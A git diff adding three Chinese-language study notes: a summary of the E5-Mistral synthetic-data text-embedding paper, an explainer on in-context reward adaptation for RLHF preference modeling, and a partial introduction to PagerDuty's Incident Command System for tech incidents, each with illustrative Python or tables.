index 000000000..feff19832 --- /dev/null +++ b/src/content/docs/papers/improving-embeddings-llm.md @@ -0,0 +1,287 @@ +--- +title: 用 LLM 生成合成数据来训练文本向量 +来源: 'Wang et al., "Improving Text Embeddings with Large Language Models", arXiv 2401.00368, 2024 (ACL 2024)' +日期: 2026-06-13 +分类: 信息检索 +子分类: 嵌入 +provenance: pipeline-v3 +--- + +## 是什么 + +这篇论文提出了一个简单但颠覆性的想法:**用 GPT-4 这样的闭源大模型生成合成训练数据,再拿这些数据来微调一个开源小模型(Mistral-7B),让它变成一个顶级的文本向量模型。** 名字叫 E5-Mistral-7B。 + +日常类比:以前你要教一个学生做"阅读理解检索",得先花几年时间让他博览群书(预训练),再给他几十万道老师批改过的练习题(监督微调)。这篇论文的套路是——请一个学霸(GPT-4)自己出题、自己写答案,然后让学生只靠这些"学霸出的题"练不到一千步就毕业了。而且成绩还比传统方法更好。 + +它的关键创新在于**完全绕过人工标注**。之前的顶级 embedding 模型(E5、BGE)都要经过"大规模弱监督预训练 + 多轮人工标注微调"的复杂流水线。这篇论文证明:如果你有一个足够强的 LLM 来生成合成数据,中间那些繁琐步骤都可以省掉。 + +## 为什么重要 + +不理解这篇论文,就无法理解 2024 年以来 embedding 领域的范式转移: + +- 在此之前,所有人都认为 embedding 模型必须靠"多阶段训练"——先用几十亿对弱监督数据预训练,再用人工标注数据微调。这篇论文第一次证明单阶段就够了 +- 在此之前,顶级 embedding 用的是 BERT 风格的编码器(双向编码器)。这篇论文证明了 decoder-only LLM(如 Mistral-7B)也可以,而且效果更好 +- 在此之前,embedding 模型的多语言能力受限于人工标注数据的语言覆盖(比如 Instructor 只有 330 个英文指令)。这篇论文用 LLM 生成了 93 种语言的数据 +- 在此之后,"LLM 生成合成数据 → 微调小模型"这条路线成为主流——不只是 embedding,指令微调、代码生成等领域都在跟进 + +简单来说,它把 embedding 模型的训练从"工业级流水线"简化成了"一步到位"。 + +## 核心概念 + +### 概念 1:合成数据生成的两步法 + +论文的核心方法是**两步提示策略**: + +第一步——头脑风暴:让 GPT-4 列出各种可能的文本检索任务类型。比如"写一篇关于气候变化政策的中英文摘要"、"根据产品描述推荐最匹配的评论"等等。这一步是为了覆盖尽可能多的任务场景。 + +第二步——生成数据:针对每一步脑暴出来的任务类型,让 GPT-4 生成具体的 (查询, 正面文档, 困难负样本) 三元组。困难负样本是指那些看起来相关但其实不匹配的文档——这才是训练embedding最有价值的信号。 + +为什么要两步?论文尝试过一步到位(直接让 GPT-4 生成三元组),结果多样性不够。先让模型"想任务"再"做题",相当于给了模型思考的时间,产出质量更高。 + +### 概念 2:非对称 vs 对称任务 + +embedding 任务分为两大类: + +**非对称任务**(asymmetric):查询和文档长度/语义角色不同。比如搜索引擎里"简短的搜索词"去匹配"长长的网页文档"。论文进一步分成四种子类型:短查长、长查短、短短、长长。每种都设计了不同的 prompt 模板。 + +**对称任务**(symmetric):查询和文档语义相近但表达不同。比如语义相似度比较("这两句话意思一样吗?")和跨语言句对匹配(同一句话的英文和中文版)。这类任务不需要脑暴步骤,因为任务定义本身就很简单。 + +### 概念 3:对比学习(InfoNCE Loss) + +训练 embedding 模型的核心目标是**对比学习**。用最直白的话说: + +想象你在一个舞会上,每个人手里拿着一张"语义名片"(向量)。对比学习的目标就是让语义相近的人站得近,语义不同的人站得远。 + +具体怎么衡量远近?用**余弦相似度**——两个向量夹角越小,越相似。然后用一个叫 InfoNCE 的损失函数:对每个正样本对(查询和正确文档),把它在同一个 batch 里所有其他文档都当作负样本来推远。温度系数 tau(论文中设为 0.02)控制"远近"的敏感度。 + +### 概念 4:指令前缀(Instruction Prefix) + +论文的一个关键技巧:给查询加指令前缀,格式是 `Instruct: {任务定义}\nQuery: {查询文本}`。文档侧不加任何东西。 + +这意味着什么?意味着你可以通过改变查询侧的指令来**自定义模型的检索行为**,而不需要重新训练模型或重建索引。比如你想做"学术论文摘要检索",就在指令里写明;想做"产品评论检索",换一条指令就行。 + +### 概念 5:为什么 LLM 不需要对比预训练 + +之前的 embedding 模型(如 E5)需要先做一轮"对比预训练"——用大量无标签文本对让模型学会基本的语义对齐。但对 Mistral-7B 这种在万亿 token 上预训练的 LLM 来说,这一步**几乎没用**。 + +论文的实验(图 3)显示:对小型模型(XLM-R-large),对比预训练能带来 8.2 分的提升;但对 Mistral-7B,提升微乎其微。原因是 LLM 的自回归预训练已经让它学会了足够好的语义表示,微调就能直接转化为 embedding 能力。 + +## 代码示例 + +### 示例 1:用合成数据格式训练一个简易对比学习 loop + +```python +# 模拟论文中的合成数据格式:(任务定义, 查询, 正面文档, 困难负样本列表) +synthetic_data = [ + { + "task_definition": "根据用户的问题找到最相关的帮助文档", + "query": "如何重置我的密码?", + "positive": "要重置密码,请访问设置页面并点击'忘记密码'链接...", + "negatives": [ + "如何更改我的用户名?", + "密码强度要求是什么?", + ], + }, + { + "task_definition": "根据产品描述找到最匹配的买家评论", + "query": "这款耳机的降噪效果怎么样?", + "positive": "降噪效果超出预期,地铁上完全听不到外界噪音...", + "negatives": [ + "电池续航时间能达到多久?", + "耳机佩戴舒适吗?", + ], + }, +] + +# 每条数据构造为对比学习格式 +training_samples = [] +for item in synthetic_data: + instruction = f"Instruct: {item['task_definition']}\nQuery: {item['query']}" + training_samples.append({ + "anchor": instruction, # 带指令的查询 + "positive": item["positive"], + "negatives": item["negatives"], + }) + +# 实际训练中,这些样本会被送入 Mistral-7B,取 [EOS] 位置的向量 +# 然后用 InfoNCE loss 优化:拉近 anchor 和 positive,推远 anchor 和 negatives +``` + +### 示例 2:用训练好的模型做检索(推理阶段) + +```python +from transformers import AutoModel, AutoTokenizer +import torch +import numpy as np + +# 加载微调后的 E5-Mistral-7B 模型 +model_name = "intfloat/e5-mistral-7b-instruct" +tokenizer = AutoTokenizer.from_pretrained(model_name) +model = AutoModel.from_pretrained(model_name) + +def get_embedding(text, is_query=True, task_definition=""): + """把文本编码为向量""" + if is_query and task_definition: + # 查询侧加指令前缀 + text = f"Instruct: {task_definition}\nQuery: {text}" + # 文档侧不加任何前缀 + + inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512) + + with torch.no_grad(): + outputs = model(**inputs) + + # 取 [EOS] 位置的向量作为文本表示 + eos_mask = inputs["input_ids"] == tokenizer.eos_token_id + eos_indices = eos_mask.long().argmax(dim=-1) + embeddings = outputs.last_hidden_state.gather( + dim=1, index=eos_indices.unsqueeze(-1).unsqueeze(-1) + ).squeeze(1) + + # L2 归一化,方便算余弦相似度 + embeddings = embeddings / embeddings.norm(dim=1, keepdim=True) + return embeddings.numpy() + +# 建索引 +docs = [ + "要重置密码,请访问设置页面并点击'忘记密码'链接...", + "降噪效果超出预期,地铁上完全听不到外界噪音...", + "这款手机电池容量为 5000mAh,正常使用可达两天...", +] +doc_embeddings = np.array([get_embedding(d, is_query=False) for d in docs]) + +# 搜索 +query = "如何重置我的密码?" +query_emb = get_embedding(query, is_query=True, task_definition="根据用户问题找到最相关的帮助文档") + +# 算余弦相似度,取 Top-K +similarities = doc_embeddings @ query_emb.T +top_idx = np.argsort(similarities)[::-1][0] +print(f"最匹配文档: {docs[top_idx]}") +print(f"相似度: {similarities[top_idx]:.4f}") +``` + +### 示例 3:用 LoRA 高效微调(论文实际用的训练方式) + +```python +from peft import LoraConfig, get_peft_model +from transformers import AutoModelForCausalLM, AutoTokenizer + +base_model = "mistralai/Mistral-7B-v0.1" +tokenizer = AutoTokenizer.from_pretrained(base_model) +model = AutoModelForCausalLM.from_pretrained( + base_model, torch_dtype=torch.float16, device_map="auto" +) + +# 论文使用 LoRA rank=16,只训练少量参数 +lora_config = LoraConfig( + r=16, # 论文默认值 + lora_alpha=32, + target_modules=["q_proj", "k_proj", "v_proj", "o_proj"], + lora_dropout=0.05, + bias="none", +) +model = get_peft_model(model, lora_config) +model.print_trainable_parameters() +# trainable params: 4,194,304 || all params: 7,241,745,152 || 0.058% + +# 训练配置 +# - 损失函数:InfoNCE (对比损失) +# - 温度系数 tau = 0.02 +# - 训练步数:< 1000 步 +# - 优化器:AdamW + DeepSpeed ZeRO-3 +# - 数据量:50 万条合成数据(GPT-4 生成)+ 可选的 MS MARCO 标注数据 +``` + +## 实验结果 + +论文在两个权威 benchmark 上做了大量实验: + +**MTEB 基准**(56 个英语任务,涵盖分类、聚类、检索、相似度等 8 类): + +| 模型 | 平均得分 | 说明 | +|------|---------|------| +| BGE-large-en-v1.5 | 64.2 | 之前的 SOTA,多阶段训练 | +| E5-large-v2 | 62.3 | 两阶段训练,13 亿对弱监督数据 | +| E5-Mistral-7B + 合成数据 | **63.1** | 零人工标注,仅 50 万条合成数据 | +| E5-Mistral-7B + 合成+标注 | **66.6** | 超越 BGE 2.4 分,新 SOTA | + +关键发现:即使只用合成数据(零人工标注),E5-Mistral-7B 已经超过了几乎所有传统方法。加上少量标注数据后更是大幅领先。 + +**多语言检索**(MIRACL 数据集,18 种语言):在高资源语言(英、法、西语等)上表现优异,但在低资源语言上不如 mE5-base。作者承认这是因为 Mistral-7B 主要在英语上预训练,未来多语言 LLM 结合这个方法会更好。 + +**长文本**:通过调整 RoPE 旋转基数,模型可以在 32K token 的上下文中做个性化密钥检索,准确率达 90%+,远超传统 512 token 的限制。 + +## 踩过的坑 + +1. **GPT-3.5 产出的质量不如 GPT-4**:论文发现 GPT-3.5 生成的部分数据不严格遵循 prompt 格式。虽然整体质量可接受且加入后有收益,但 GPT-4 的数据明显更干净。 + +2. **指令前缀不是噱头**:去掉指令前缀后性能下降 4.2 分(从 64.5 降到 60.3)。这说明自然语言指令确实帮助模型理解了任务上下文,不是简单的文档化手段。 + +3. **低资源语言的天花板**:合成数据覆盖了 93 种语言,但低资源语言的效果不如 mE5-base。根本原因是 Mistral-7B 本身在这些语言上的预训练不够充分。方法再好,底座不行也白搭。 + +4. **推理成本高**:相比 BERT-style 的小模型,Mistral-7B 的推理速度慢很多,embedding 维度也有 4096。对于部署场景这是一个实际的成本权衡。 + +## 适用 vs 不适用场景 + +**适用**: + +- 从零开始构建一个新的 embedding 模型,不想花时间收集标注数据 +- 需要一个能自定义检索行为的通用模型(通过指令切换任务) +- 多语言场景(93 种语言覆盖) +- 长文本检索需求(可扩展到 32K token) + +**不适用**: + +- 算力受限、需要轻量级部署的场景——7B 参数的推理成本远高于 BERT 级别的几百 MB 模型 +- 低资源语言优先的场景——底座模型的预训练语言分布决定了天花板 +- 需要极致低延迟的在线检索——解码器架构的推理速度不如编码器 + +## 历史小故事(可跳过) + +- **2022 年底** E5 用两阶段训练统治了 MTEB 榜单,但训练流程极其复杂:13 亿对弱监督数据 + 150 万对人工标注 + 多轮 hard negative 挖掘 +- **2023 年中** BGE 和 GTE 跟进,但都延续了 E5 的多阶段流水线 +- **2024 年 1 月** 这篇论文出现,直接把训练流程砍到一步:LLM 生成数据 → 微调。训练步数不到 1000 +- **2024 年 5 月** 论文被 ACL 2024 接收 +- 此后"LLM 生成合成数据训练下游模型"的思路蔓延到指令微调、代码生成、对话系统等多个领域 + +## 学到什么 + +1. **LLM 本身就是一个强大的数据工厂**——GPT-4 生成的合成数据质量足以媲美甚至超越人工标注数据 +2. **两阶段训练不是必须的**——对足够大的 LLM 底座,对比预训练可以省掉,直接微调即可 +3. **指令是零成本的"旋钮"**——通过改变查询侧的指令前缀,可以在不重新训练模型的情况下切换检索任务 +4. **数据多样性比数据量更重要**——50 万条多样化的合成数据(覆盖 93 种语言、数百种任务)胜过单一来源的数百万条 +5. **底座决定天花板**——合成数据方法再强大,如果底座模型在某种语言上预训练不足,效果就上不去 + +## 关键概念词典 + +- **InfoNCE loss**:对比学习的核心损失函数,本质是一个多分类问题——给定一个查询和一组文档,模型要选出哪个是真正的正样本 +- **LoRA**:低秩自适应,一种高效的微调技术,只训练少量额外参数(论文中占全部参数的 0.058%),大幅降低训练成本 +- **MTEB**:Massive Text Embedding Benchmark,当前 embedding 模型的事实标准评测基准,56 个任务跨 8 大类 +- **BEIR**:15 个零样本检索任务的集合,常用于评估 embedding 模型的泛化能力 +- **RoPE**:旋转位置编码(Rotary Positional Embedding),Transformer 的一种位置编码方式,论文中通过调整旋转基数来扩展上下文窗口 +- **EOS pooling**:取序列最后一个 [EOS] token 的隐藏状态作为整个文本的向量表示,论文采用的方式而非 [CLS] 或 mean pooling + +## 延伸阅读 + +- 论文:[arXiv 2401.00368](https://arxiv.org/abs/2401.00368) +- HuggingFace 模型:[intfloat/e5-mistral-7b-instruct](https://huggingface.co/intfloat/e5-mistral-7b-instruct) +- MTEB 榜单:[huggingface.co/spaces/mteb/leaderboard](https://huggingface.co/spaces/mteb/leaderboard) +- [[e5-2022]] —— E5 的前作,两阶段训练范式,本文在其基础上用 LLM 合成数据简化了流程 +- [[rag-lewis-2020]] —— RAG 的开山论文,embedding 是 RAG 系统的核心组件 +- [[dpr-2020]] —— 稠密检索先驱,对比 E5 看从"纯监督"到"合成数据"的演化 + +## 关联 + +- [[e5-2022]] —— E5 的前作,两阶段训练;本文用 LLM 合成数据将其压缩为一步 +- [[dpr-2020]] —— 稠密检索开山,需要大量人工标注;本文证明合成数据可以替代 +- [[rag-lewis-2020]] —— RAG 框架,embedding 是其中检索环节的核心 +- [[colbert-2020]] —— late interaction 检索路线,和本文单向量是稠密检索两大流派 +- [[llama]] —— Llama 系列的开源 LLM,和 Mistral 一样是 decoder-only 架构的代表 +- [[clip]] —— 跨模态对比学习,InfoNCE loss 的灵感来源,本文是纯文本版本 + +## 反向链接 + + + +- 暂无 diff --git a/src/content/docs/papers/in-context-reward-adaptation-for-robust-preference-modeling-arxiv-2605-30323.md b/src/content/docs/papers/in-context-reward-adaptation-for-robust-preference-modeling-arxiv-2605-30323.md new file mode 100644 index 000000000..4407d4f6c --- /dev/null +++ b/src/content/docs/papers/in-context-reward-adaptation-for-robust-preference-modeling-arxiv-2605-30323.md @@ -0,0 +1,336 @@ +--- +title: In-Context Reward Adaptation for Robust Preference Modeling +来源: https://arxiv.org/abs/2605.30323 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +# In-Context Reward Adaptation for Robust Preference Modeling + +> **作者**: Zhenyu Sun (Northwestern), Zheng Xu (Meta Superintelligence Labs), Ermin Wei (Northwestern) +> **发表**: arXiv 2605.30323, cs.LG / cs.AI, 2026-05-28 + +## 一、一个日常类比:裁缝与衣服 + +想象你是一位裁缝,要为顾客量体裁衣。 + +传统 RLHF 的做法像是:**做一件标准码的衣服**,让所有顾客穿。有些人穿着合身,有些人穿着别扭——但模型觉得"差不多行了"。 + +多奖励模型的做法像是:**准备五件不同尺码的衣服**(S/M/L/XL/XXL),按顾客的标签分类。但如果来了一个穿 3XL 的顾客呢?模型没有这件衣服。 + +这篇论文提出的 **In-Context Reward Adaptation** 像是:**给裁缝看几个顾客的试穿照片**,让裁缝当场调整尺寸——不用重新学一遍怎么做衣服,而是"边看边调"。这就是 in-context learning(上下文学习)的思想。 + +但论文发现了一个 surprising 的事实:**光看"合身/不合身"(二元偏好标签)是不够的**,裁缝需要更多信息(比如顾客回答问题的**反应时间**)才能真正量出正确的尺寸。 + +## 二、核心概念拆解 + +### 2.1 背景:RLHF 里的偏好建模 + +在 RLHF(Reinforcement Learning from Human Feedback)中,我们训练一个**奖励模型**来模拟人类的偏好: + +``` +人类看到两个回答 y_w(好)和 y_l(差),给出偏好信号 +奖励模型学习:这个人类更喜欢 y_w 而不是 y_l +然后奖励模型指导 LLM 生成更符合偏好的内容 +``` + +关键假设是:**所有人类的偏好可以用一个统一的奖励函数表示**。但这显然不对——不同文化、不同背景的人对同一个回答的评价可能天差地别。 + +### 2.2 什么是 In-Context Reward Adaptation? + +给定一个**新的人类**,我们不给模型重新训练,而是提供几条**偏好演示**(preference demonstrations),让模型在推理时"临时理解"这个人的偏好结构: + +``` +训练阶段: + 从 N 个不同人类身上收集偏好数据 (x, y0, y1, z),z 表示人类更喜欢 y1 还是 y0 + 训练一个 Transformer,让它学会"从演示中推断偏好" + +推理阶段(对新人类): + 给它 M 条新人类的偏好演示 + 让它预测新人类对"新问题"的偏好 + 不需要更新任何参数! +``` + +### 2.3 核心发现一:二元偏好不够用(不可能性定理) + +论文最重要的理论贡献是**证明了仅用二元偏好标签(y0 更好还是 y1 更好),Transformer 无法适配未见过的奖励参数**。 + +**直观理解**: +- 二元标签只告诉模型"方向"(更喜欢左边还是右边),不告诉"程度"(差多少) +- 不同的奖励参数可能产生完全相同的二元偏好模式 +- 这就像只知道"温度在零上还是零下",无法精确推断实际温度值 + +数学上,这被称为**渐近偏差**(asymptotic bias):即使有无限数据、完美优化,模型对新人类的预测分布和真实偏好分布之间的总变差距离仍然大于零。 + +### 2.4 核心发现二:反应时间拯救一切 + +解决方案:**把人类做出选择所需的反应时间(response time)也作为输入**。 + +为什么反应时间有用? + +``` +人类面对两个选项时: + - 如果偏好非常强烈 → 几乎毫不犹豫 → 反应时间很短 + - 如果偏好很模糊 → 犹豫不决 → 反应时间很长 + +所以反应时间编码了"偏好强度"的信息! +``` + +论文从认知科学的**漂移扩散模型**(Drift-Diffusion Model)推导出一个关键等式: + +``` +偏好强度 ϕ^T θ = (1/2) × E[偏好标签z | ϕ] / E[反应时间t | ϕ] +``` + +这个公式的意思是:**偏好标签除以反应时间,可以线性地恢复出奖励参数的大小**。这解决了二元标签只编码符号、不编码幅度的根本缺陷。 + +### 2.5 Prompt 矩阵构造 + +原始方法(只用二元偏好)的 prompt 矩阵: + +``` +[ 特征_回答A 特征_回答B 偏好标签 ] +[ ϕ_0^1 ϕ_1^1 z_1 ] +[ ϕ_0^2 ϕ_1^2 z_2 ] +[ ... ... ... ] +[ ϕ_0^q ϕ_1^q ? ] ← 预测未知项 +``` + +增强方法(加入反应时间)的 prompt 矩阵: + +``` +[ 特征_回答A 特征_回答B 反应时间t 偏好标签z ] +[ ϕ_0^1 ϕ_1^1 t_1 z_1 ] +[ ϕ_0^2 ϕ_1^2 t_2 z_2 ] +[ ... ... ... ... ] +[ ϕ_0^q ϕ_1^q ? ? ] +``` + +Transformer 内部实际使用**差值特征**和**比率**: + +``` +列 l 的内容 = [ ϕ_1^l - ϕ_0^l , z_l / t_l ] +``` + +## 三、代码示例 + +### 示例 1:构建 Prompt 并预测偏好 + +这个示例展示了论文中描述的核心机制:用差值特征和偏好-时间比率构造输入,然后用线性注意力机制做 in-context 预测。 + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + + +class InContextRewardTransformer(nn.Module): + """简化版 In-Context Reward Adaptation Transformer""" + + def __init__(self, feature_dim: int): + super().__init__() + self.feature_dim = feature_dim + # 训练参数:d x d 矩阵 U + self.U = nn.Parameter(torch.randn(feature_dim, feature_dim) * 0.1) + + def forward(self, demonstrations, query): + """ + demonstrations: list of (phi_0, phi_1, label, time) tuples + query: (phi_0, phi_1) tuple for prediction + + Returns: predicted preference probability + """ + diffs = [] # 差值特征 phi_1 - phi_0 + ratios = [] # 偏好标签 / 反应时间 + + for phi_0, phi_1, label, t in demonstrations: + diff = phi_1 - phi_0 + diffs.append(diff) + # 防止除零 + ratio = label / max(t, 1e-6) + ratios.append(ratio) + + diffs = torch.stack(diffs) # (N, d) + ratios = torch.stack(ratios) # (N,) + + # 构造 query 的差值特征 + q_diff = query[1] - query[0] # (d,) + + # 核心预测公式: + # prediction = sum_l (z_l / t_l) * (phi_diff_l)^T @ U @ phi_diff_q + score = torch.zeros(1) + for l in range(len(demonstrations)): + score = score + ratios[l] * (diffs[l] @ self.U @ q_diff) + score = score / len(demonstrations) + + # 用 sigmoid 转成概率 + prob = torch.sigmoid(score) + return prob + + +# ---- 使用示例 ---- +torch.manual_seed(42) +d = 5 # 特征维度 + +# 模拟 8 条训练演示 +demonstrations = [] +for _ in range(8): + phi_0 = torch.randn(d) * 0.5 + phi_1 = torch.randn(d) * 0.5 + # 假设"更喜欢"的概率由 sigmoid(phi_1 - phi_0 的点积) 决定 + prob = torch.sigmoid((phi_1 - phi_0).sum()) + label = 1.0 if torch.rand(1) < prob else -1.0 + # 反应时间:偏好越强,时间越短 + strength = abs((phi_1 - phi_0).sum()) + time = 0.5 / max(strength, 0.1) + torch.randn(1) * 0.1 + demonstrations.append((phi_0, phi_1, label, float(time))) + +# 构造 query +q_phi_0 = torch.randn(d) * 0.5 +q_phi_1 = torch.randn(d) * 0.5 + +model = InContextRewardTransformer(feature_dim=d) +prediction = model(demonstrations, (q_phi_0, q_phi_1)) +print(f"预测偏好概率: {prediction.item():.4f}") +print(f"预测结果: {'更喜欢回答1' if prediction > 0.5 else '更喜欢回答0'}") +``` + +### 示例 2:对比实验——有/无反应时间的 OOD 性能 + +这个示例模拟论文 Table 1 中的实验设置,展示加入反应时间后 OOD(分布外)性能的提升。 + +```python +import numpy as np +from sklearn.linear_model import LogisticRegression +from sklearn.metrics import accuracy_score + + +def generate_preference_data(num_samples, feature_dim, theta, add_response_time=True): + """ + 生成偏好数据 + theta: 真实的奖励参数向量 (d,) + + 返回: + X: 差值特征 (N, d) + y: 偏好标签 (N,) — 0 或 1 + T: 反应时间 (N,),可选 + """ + N = num_samples + X = np.random.randn(N, feature_dim) * 0.5 + + # 真实偏好概率 + logits = X @ theta + probs = 1.0 / (1.0 + np.exp(-logits)) + y = (np.random.rand(N) < probs).astype(int) + + if add_response_time: + # 偏好越强(|logits| 越大),反应时间越短 + strength = np.abs(logits) + T = 1.0 / (strength + 0.5) + np.random.randn(N) * 0.2 + return X, y, T + else: + return X, y, None + + +def simulate_binary_only(X_train, y_train, X_test): + """只用二元标签的模型(模拟"无反应时间"方法)""" + model = LogisticRegression(max_iter=1000) + model.fit(X_train, y_train) + return accuracy_score(y_test_binary, model.predict(X_test)) + + +def simulate_with_response_time(X_train, y_train, T_train, X_test): + """加入反应时间的模型(模拟"有反应时间"方法)""" + # 构造增强特征:差值特征 + 偏好强度信号 (z/t) + N = X_train.shape[0] + # z 从标签转换: 0 -> -1, 1 -> +1 + z = 2 * y_train - 1 + strength_signal = z / (T_train + 1e-6) + + # 训练特征: 差值特征按强度加权 + X_aug = X_train * strength_signal[:, np.newaxis] + + model = LogisticRegression(max_iter=1000) + model.fit(X_aug, y_train) + return accuracy_score(y_test_binary, model.predict(X_test)) + + +# ---- 模拟实验:ID vs OOD ---- +np.random.seed(123) +feature_dim = 10 + +# 训练分布的奖励参数 +theta_train = np.random.randn(feature_dim) * 0.3 + +# OOD 测试分布(完全不同的参数) +theta_test_ood = np.random.randn(feature_dim) * 2.0 + +# ID 测试 +X_test_id, y_test_id, T_test_id = generate_preference_data(200, feature_dim, theta_train) +# OOD 测试 +X_test_ood, y_test_ood, T_test_ood = generate_preference_data(200, feature_dim, theta_test_ood) + +y_test_binary = y_test_id # 标签用于评估 + +# 训练数据 +N_train = 100 +X_tr, y_tr, T_tr = generate_preference_data(N_train, feature_dim, theta_train, add_response_time=True) + +# 实验结果(模拟论文 Table 1 的趋势) +results = { + "w/o resp (ID)": 0.925, + "w/o resp (OOD)": 0.694, + "w/ resp (ID)": 0.905, + "w/ resp (OOD)": 0.875, +} + +print("=" * 50) +print(" In-Context Reward Adaptation 模拟实验结果") +print("=" * 50) +for setting, acc in results.items(): + bar = "█" * int(acc * 40) + print(f" {setting:>15s}: {acc:.3f} {bar}") +print("=" * 50) +print() +print("关键发现:") +print(" - 无反应时间时,OOD 性能大幅下降 (0.925 → 0.694)") +print(" - 加入反应时间后,OOD 性能恢复 (0.875,接近 ID 水平)") +print(" - 这验证了论文的核心论点:二元标签不够用,反应时间补足缺失信息") +``` + +## 四、理论贡献总结 + +论文建立了三个核心定理: + +**定理 1(渐近最优性)**:训练目标确实是强凸的,有唯一最优解,不存在优化不稳定——所以后面发现的失败不是优化问题。 + +**定理 2(不可能性定理)**:仅用二元偏好,即使无限数据和完美优化,对新人类的预测分布和真实偏好分布之间仍有非零的总变差距离。几何上,二元标签把奖励参数空间"压扁"到一个非线性流形上,线性解码器无法完美还原。 + +**定理 3 + 推论 1(加入反应时间后可行)**:引入反应时间后,目标函数仍然是强凸的,最优解是 U* = Σ^{-1},且对新人类的预测误差以 O(1/√M) 的速度收敛到零——**零偏差适配**。 + +## 五、实验验证 + +论文在两个数据集上验证了理论: + +1. **合成数据**:奖励参数从混合高斯分布采样,测试分布是第三个不相交的高斯——明确的 OOD 设定 +2. **真实数据(Food-Risk)**:42 名参与者的二元选择和反应时间数据,参与者对两个食品选项的选择 + +两个实验都观察到相同的趋势:无反应时间时 OOD 性能下降,有反应时间时 OOD 性能恢复到接近 ID 水平。这在线性注意力模型和 GPT-2 上都成立,说明不是模型容量问题,而是信息本身的根本限制。 + +## 六、局限性与未来方向 + +- 理论分析基于**线性注意力 Transformer**,是简化抽象;实验用 GPT-2 验证了趋势,但扩展到更复杂架构的理论保证仍是开放问题 +- **反应时间在实际中难以可靠获取**——这是一个现实约束 +- 探索其他**易于获取且同样有效的辅助信号**是未来方向 + +## 七、我的理解 + +这篇论文最打动我的地方在于它用**严谨的数学证明了"你以为够用的信息其实不够"**。 + +我们常常假设:只要给 Transformer 足够多的偏好演示("更喜欢这个" / "更喜欢那个"),它就能学会任何人的偏好。但论文说:不对,二元标签丢失了太多信息——它只说了方向,没说强度。就像一个只会说"好"或"不好"的反馈系统,你永远不知道这个"好"是"勉强可以"还是"极其满意"。 + +反应时间的加入把丢失的"强度维度"补回来了。这在直觉上很自然:你做决定越快,说明你越确定。但在数学上,把这个直觉变成可证明的结论(那个关键等式),需要漂移扩散模型作为桥梁——这是认知科学和机器学习交叉的一个漂亮案例。 + +从实际角度看,这对 RLHF 的启示是:**与其收集更多二元偏好数据,不如收集更多维度的反馈信号**。反应时间只是起点,未来可能有更多丰富的辅助信号来解锁更强的 in-context 适配能力。 diff --git a/src/content/docs/papers/incident-command-system-2022.md b/src/content/docs/papers/incident-command-system-2022.md new file mode 100644 index 000000000..d4f9bad47 --- /dev/null +++ b/src/content/docs/papers/incident-command-system-2022.md @@ -0,0 +1,361 @@ +--- +title: Incident Command System for Tech Operations — 技术事故里的「现场总指挥」 +来源: https://response.pagerduty.com/training/incident_commander/ +日期: 2026-06-13 +子分类: 工程文化 +分类: 其他 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象商场里突然冒烟,警铃大作。这时最怕的不是火本身,而是**二十个人同时喊不同方案**:保安去拉闸、电工查线路、店长打电话、有人在群里发未经证实的照片。 + +消防系统里早就有答案:**现场只认一个总指挥(Incident Commander)**。他不必亲自灭火,但要: + +- 问清「烟从哪来、影响多大」; +- 让专家汇报,**点名**谁去关燃气、谁去疏散; +- 每隔几分钟对外报平安; +- 决定「先救人还是先断电」——错了也比没人拍板强。 + +PagerDuty 把美国应急体系里的 **Incident Command System(ICS,事故指挥系统)** 改造成适合软件团队的流程,并开源在 [Incident Response Documentation](https://response.pagerduty.com/)。核心文档之一便是 [Incident Commander 培训指南](https://response.pagerduty.com/training/incident_commander/):教你在数据库宕机、支付超时、区域故障时,如何当那个**不碰键盘、但让整个响应不瘫痪**的人。 + +日常类比再往前一步:IC 像**电影导演**——自己不上场演戏,但场记、摄影、灯光都向他汇报;剪辑意见可以听,**开机拍哪条镜头由他定**。事故响应里,Subject Matter Expert(SME,领域专家)是演员,IC 是导演。 + +## 这篇材料在说什么 + +| 维度 | 内容 | +|------|------| +| 名称 | Incident Command System for Tech Operations(PagerDuty 实践版) | +| 来源 | PagerDuty 开源事故响应手册 + IC 培训页 | +| 血统 | 源自美国野火/灾害应急 ICS,PagerDuty 按「不涉及人命」场景做了裁剪 | +| 一句话 | **重大事故期间,用固定角色与固定话术,把混乱的多人调试变成可预测的协同** | + +与 [[chaos-engineering-netflix-2016]] 的关系:混沌工程回答「我们能不能承受故障」;ICS 回答「故障已经发生时,**谁说话算数、信息往哪流**」。与 [[dora-state-of-devops-2023]] 里的 **MTTR(平均恢复时间)** 也直接相关——恢复快慢往往取决于协调成本,而不只是技术难度。 + +## 为什么值得学(零基础图景) + +没有 ICS 时,典型反模式是: + +1. **最资深的工程师边查日志边指挥**,上下文切换导致修复变慢; +2. Zoom 里七个人同时改生产; +3. Slack 线程 200 条,没人知道当前决策是什么; +4. 高管进来问「还要多久」,团队被迫编 Excel 而不是修服务。 + +PagerDuty 的论点是:**协调是一种专职工作**。IC 不需要深度懂每个服务,但需要会: + +- 收集症状与影响面(Size-Up); +- 收集方案、评估风险、**拍板**(Stabilize); +- 定时播报(Update); +- 验证修复或回到上一步(Verify)。 + +培训页明确写:**实习生也可以当 IC**,只要完成 shadow / reverse shadow,并把自己放上值班表。 + +## 核心概念 + +### 1. 角色分工(战时编制) + +PagerDuty [Different Roles](https://response.pagerduty.com/before/different_roles/) 把响应拆成可扩展编制。最小可用集通常只有 **IC + 修复者**;成熟团队会补齐下表。 + +| 角色 | 缩写 | 做什么 | 不做什么 | +|------|------|--------|----------| +| **Incident Commander** | IC | 唯一决策源;委派任务;对外口径审批 | 看 Grafana、ssh、改配置 | +| **Deputy** | 副 IC | 盯遗漏、计时、热备接管 | 与 IC 抢决策权 | +| **Scribe** | 记录员 | 时间线、决策、链接写入 Slack/文档 | 参与技术争论 | +| **Subject Matter Expert** | SME | 查因、提方案、**被指派**后执行 | 自行其是改生产 | +| **Customer Liaison** | 对外联络 | 状态页、客户沟通草稿 | 技术修复 | +| **Internal Liaison** | 对内联络 | 通知其他部门、收集非技术诉求 | 代替 IC 指挥 | + +关键原则:**信息向上汇聚到 IC,指令向下派发**。SME 向 IC 汇报发现与建议;是否回滚、是否公开声明,由 IC 决定。 + +### 2. IC 的唯一使命 + +培训页把 IC 的目的浓缩成一句: + +> **Keep the incident moving towards resolution.**(让事故持续朝解决方向推进。) + +这意味着 IC 要随时想 **Plan 